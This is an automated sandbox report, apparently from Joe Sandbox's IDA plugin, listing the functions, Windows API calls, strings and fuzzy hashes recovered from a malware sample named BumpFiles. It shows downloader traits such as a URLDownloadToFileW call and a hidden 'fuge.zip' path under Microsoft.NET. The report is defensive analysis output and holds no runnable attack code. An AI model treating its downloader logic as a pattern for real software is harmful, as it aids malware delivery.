C:\Program Files (x86)\Microsoft.NET\fuge.zip, xrefs: 00633474
FDFB72E7E69C5772296516FA15ADE623EB5317D590422D9D39B841583F69654EB01771A93E3C6685ECFDAF5044207C47AF2A6011DCB4EB23065CF5F0950FAB, xrefs: 00633467
C:\Program Files (x86)\Microsoft.NET\base, xrefs: 00633441, 0063344F

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: FileSleep$AdminAttributesCreateDirectoryDownloadMessageUser
String ID: C:\Program Files (x86)\Microsoft.NET\base$C:\Program Files (x86)\Microsoft.NET\fuge.zip$FDFB72E7E69C5772296516FA15ADE623EB5317D590422D9D39B841583F69654EB01771A93E3C6685ECFDAF5044207C47AF2A6011DCB4EB23065CF5F0950FAB
API String ID: 3215071381-4060426360
Opcode ID: f6837130be4614ce25fd961279331029222d47893cd0f967968c80173aceed89
Instruction ID: 8dad2de6a8b3dea3eefc5337c2ac44f97f3349aa0d5aad20445da69dd7c69d86
Opcode Fuzzy Hash: f6837130be4614ce25fd961279331029222d47893cd0f967968c80173aceed89
Instruction Fuzzy Hash: 9811B670600714AFD711FF61DD52ADE73EADB48304F90446AF401A7393DA39AF0187A8

Uniqueness

Uniqueness Score: -1.00%

Function 005EDEA4 Relevance: 10.6, APIs: 7, Instructions: 105
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005EDEB8
IsWindowUnicode.USER32 ref: 005EDECC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005EDEEF
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005EDF05
TranslateMessage.USER32 ref: 005EDF8A
DispatchMessageW.USER32 ref: 005EDF97
DispatchMessageA.USER32 ref: 005EDF9F

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
String ID:
API String ID: 2190272339-0
Opcode ID: 3098b82d3c33b3f691702e6728c507f08bf160ba0ef26f0c27fb9a5b6649148f
Instruction ID: 1e2ffcf5faaac0e623271d00fe91a0f5e8c3699351e3eb57bdfabddf9ae2a005
Opcode Fuzzy Hash: 3098b82d3c33b3f691702e6728c507f08bf160ba0ef26f0c27fb9a5b6649148f
Instruction Fuzzy Hash: 86210A30B547C065EA39B52B0C06BFEAFB96FD6704F14451DF4E29B2C2DA9D9C424236

Uniqueness

Uniqueness Score: -1.00%

Function 005EE0E8 Relevance: 3.1, APIs: 2, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000EC), ref: 005EE1C9
SetWindowLongW.USER32(?,000000EC,00000000), ref: 005EE1E0

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: a032363e6cd12d6b15dd093dad1e4387557bbf03b2e8300dc75afd9b24e6e34b
Instruction ID: 49b3cee1a357ac9e4b63db1826b3323ea065a8a199be338292a45e01145cc57d
Opcode Fuzzy Hash: a032363e6cd12d6b15dd093dad1e4387557bbf03b2e8300dc75afd9b24e6e34b
Instruction Fuzzy Hash: AA418234A04684EFDB18CF69C886A9DBBF6FB49300F6185E5E850A7391C7349E41DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5E8 Relevance: 3.1, APIs: 2, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNEL32(00000000,0040D6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D786,00000000,?,00000105), ref: 0040D693
GetSystemDefaultUILanguage.KERNEL32(00000000,0040D6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D786,00000000,?,00000105), ref: 0040D6BB

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: DefaultLanguage$SystemUser
String ID:
API String ID: 384301227-0
Opcode ID: 8a2bd1881834e6a44c33d5fad18fbb006ed95a30fdac29b3a3123759fe5b540d
Instruction ID: dba43ac39d730306daca4e1ada09fe9982239cc22dcd487a1f983162ddf5979f
Opcode Fuzzy Hash: 8a2bd1881834e6a44c33d5fad18fbb006ed95a30fdac29b3a3123759fe5b540d
Instruction Fuzzy Hash: 4231FE34E042099BDB10EBE5C881BAEB7B5AB48308F50487BE414B73D1DB79AD49CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D70C Relevance: 3.1, APIs: 2, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D748
LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D799

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: FileLibraryLoadModuleName
String ID:
API String ID: 1159719554-0
Opcode ID: 2b18c3781ee66c6b53a5173a8fe35087fbd537bb29e21f2de5c79d474cbb7333
Instruction ID: 8aa48a9f0ad89ad4cad376e89223919de5cbdd47df10d573a1ffb6370790ae73
Opcode Fuzzy Hash: 2b18c3781ee66c6b53a5173a8fe35087fbd537bb29e21f2de5c79d474cbb7333
Instruction Fuzzy Hash: D8114270A4021CAFDB14EB64CC86BDE73B8DB44704F5144BAB508B72D1DA785E858A59

Uniqueness

Uniqueness Score: -1.00%

Function 00407CFB Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000,00000000,00000000,00000000,00407D6A,?,?,?,00000000), ref: 00407D49

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: 41aa4a8758972083fda76d886b23328867988b7c9d560f1c8c924052a9eedc68
Instruction ID: 875274e2c4264f451e6ad1d12119ad3db8eed83e6ea6ef1fa48c92378bfb3a92
Opcode Fuzzy Hash: 41aa4a8758972083fda76d886b23328867988b7c9d560f1c8c924052a9eedc68
Instruction Fuzzy Hash: E5F0AF756486447EDB11F779CC82E5E73ACDF88704B2104BAF400F2292E6BD5E04962A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C498 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00400000,?,0000020A), ref: 0040C4B6

Part of subcall function 0040D70C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D748
Part of subcall function 0040D70C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D799

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: FileModuleName$LibraryLoad
String ID:
API String ID: 4113206344-0
Opcode ID: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
Instruction ID: 3a4ae58969193307bce1041edd5d9d761091ef52682c61390113b32e0b793339
Opcode Fuzzy Hash: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
Instruction Fuzzy Hash: 92E0ED71A00310DBCB10DFA8D8C5A5737E4AB08754F0446A6ED14DF386D375DD1487D5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F134 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 0040F138

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
Instruction ID: c9d0dbab03ec1449dfd6cadc3055f85912d320d9fe12348b59d5370955ded952
Opcode Fuzzy Hash: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
Instruction Fuzzy Hash: 3DA012244089001AC404A7197C4340F31805D41114FC40B68745CB52C2E619C5640BDB

Uniqueness

Uniqueness Score: -1.00%

Function 0040564C Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,00405C63), ref: 00405663

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d6471b694c53482f29af37f4d684f3e9f2dc181e884f57fe696aea683e58fed0
Instruction ID: 7b51e7b86078a4719c2a56ad589d93d8956ad9d8034c142f37d3783c14cff872
Opcode Fuzzy Hash: d6471b694c53482f29af37f4d684f3e9f2dc181e884f57fe696aea683e58fed0
Instruction Fuzzy Hash: EEF0AFF2B013018FE7549F789D417027BD6E705354F10817EE90DEBB98D7B088418B94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040CE18 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 0040CE35
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040CE46
FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 0040CF46
FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 0040CF58
lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 0040CF64
lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 0040CFA9

Strings

GetLongPathNameW, xrefs: 0040CE40
\, xrefs: 0040CF76
kernel32.dll, xrefs: 0040CE30

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameW$\$kernel32.dll
API String ID: 1930782624-3908791685
Opcode ID: 1b30c6aa4afaed83ea31088e8fb335b792bc7b3c0a28b9d7d69bc162d0d5a7e3
Instruction ID: df3eba0b7ab91270250ab933d467d2b4ce9c97f00ef9e3a73738d7b4f4df9431
Opcode Fuzzy Hash: 1b30c6aa4afaed83ea31088e8fb335b792bc7b3c0a28b9d7d69bc162d0d5a7e3
Instruction Fuzzy Hash: D2417332E00519DBCB10EB68CCC5ADEB3B6AF44314F1486B6A504F72D1E7789E45DA89

Uniqueness

Uniqueness Score: -1.00%

Function 005E0E94 Relevance: 12.1, APIs: 8, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 005E0EA2
IsIconic.USER32(?), ref: 005E0ED0
IsWindowVisible.USER32(?), ref: 005E0EE0
ShowWindow.USER32(?,00000000,00000000,?,?,?,005EE203,?,006551D0), ref: 005E0EFD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 005E0F10
SetWindowLongW.USER32(?,000000EC,00000000), ref: 005E0F21
ShowWindow.USER32(?,00000006,00000000,?,?,?,005EE203,?,006551D0), ref: 005E0F41
ShowWindow.USER32(?,00000005,00000000,?,?,?,005EE203,?,006551D0), ref: 005E0F4B

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Window$LongShow$IconicVisible
String ID:
API String ID: 3484284227-0
Opcode ID: 153ce922c674a532d80c97f86a4cd859b1415a9a321f720c0de561082abaa5d9
Instruction ID: fc07e678b8b521b91e32f980c44dac548b3b61d93d6eebad58e43b97ab7ab2bd
Opcode Fuzzy Hash: 153ce922c674a532d80c97f86a4cd859b1415a9a321f720c0de561082abaa5d9
Instruction Fuzzy Hash: B1113A2210EAD074D23A32371C02FEF1E985FD3324F18892EF1E8E50C2C26C89C5822B

Uniqueness

Uniqueness Score: -1.00%

Function 00633A38 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000012C,00000000,00633AEE), ref: 00633A6F
URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00633A8C
Sleep.KERNEL32(0000012C,0000012C,00000000,00633AEE), ref: 00633AC6

Strings

hWe, xrefs: 00633A91, 00633AA5
dWe, xrefs: 00633AB2

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Sleep$DownloadFile
String ID: dWe$hWe
API String ID: 2087964873-58362703
Opcode ID: 04cbe2486e640521b758a2ff6ddd802f746ddcb316689a65afaa4eebd1ce7cdd
Instruction ID: e38bbcdaf700aa6aab6cb9e7a4f3a98896630684cfae030678e04ef5b335f524
Opcode Fuzzy Hash: 04cbe2486e640521b758a2ff6ddd802f746ddcb316689a65afaa4eebd1ce7cdd
Instruction Fuzzy Hash: 62113D74600204AFD700EB55C892E8D77B5EF4A344F504076F504AB3E2D779AE019A99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9BC Relevance: 4.6, APIs: 3, Instructions: 99COMMON

Download Yara Rule

APIs

IsValidLocale.KERNEL32(?,00000002,00000000,0040CB21,?,?,?,00000000), ref: 0040CA66
GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040CB21,?,?,?,00000000), ref: 0040CA82
GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040CB21,?,?,?,00000000), ref: 0040CA93

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Locale$Info$Valid
String ID:
API String ID: 1826331170-0
Opcode ID: ad3de78e447f79a9d5c8a36d098a659f3a87ca39114a4d2c18dd351f82df870f
Instruction ID: 32193daf775a97d202d3fb3a0b5ab3bed95078009c6c530a1f27204a2a6a35ae
Opcode Fuzzy Hash: ad3de78e447f79a9d5c8a36d098a659f3a87ca39114a4d2c18dd351f82df870f
Instruction Fuzzy Hash: AD319E34A0061CEBDB20DF55DCC2B9EB7B6EB49701F5042BAA508B32D1D6396E80CE59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F148 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 0040F148

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 1cd4377a6b1d967cc78fa149afafeeac03ff185f122abd55826d7edf55432034
Instruction ID: 7420d91a343197e2725c1ed6fdd5669b345e5498412afaef9b1ca0b30dea7431
Opcode Fuzzy Hash: 1cd4377a6b1d967cc78fa149afafeeac03ff185f122abd55826d7edf55432034
